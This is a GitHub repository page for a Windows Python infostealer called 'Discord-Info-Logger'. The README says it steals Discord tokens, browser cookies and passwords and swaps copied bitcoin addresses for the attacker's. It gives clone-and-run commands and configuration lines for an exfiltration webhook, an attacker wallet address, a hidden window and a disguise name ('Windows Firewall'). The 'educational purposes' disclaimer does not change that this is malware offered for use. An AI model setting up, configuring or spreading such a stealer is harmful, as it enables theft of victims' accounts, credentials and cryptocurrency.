Skip to content

A free, efficient, and open-source discord token logger, that also grabs cookies, passwords, and intercepts bitcoin addresses.. This is purely for demonstration/educational purposes.

Notifications You must be signed in to change notification settings

ramin245/Discord-Info-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Discord-Info-Logger

A free, efficient, and open-source discord token logger, that also grabs cookies, passwords, and intercepts bitcoin addresses. This is purely for demonstration/educational purposes.

Setup

Depending on your python installation your commands may vary. Below are the commands needed to set up. The script was tested in python 3.8.6, on windows 10. This script only works on windows.

Windows:

git clone https://github.com/LocalsGitHub/Discord-Info-Logger.git
cd Discord-Info-Logger
pip install -r requirements.txt
py TokenLogger.py

Config

Once you have opened the script in your desired text editor, there are 3 lines that you can change.

# Configuration
BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address
webhookURL = "webhook" <--- Change this to your own webhook
hiddenWindow = False <--- Set this to True or False. If you want the window to be hidden on execution then set this to True
FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.

Support

Create an issue, or message me on discord.

About

A free, efficient, and open-source discord token logger, that also grabs cookies, passwords, and intercepts bitcoin addresses.. This is purely for demonstration/educational purposes.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages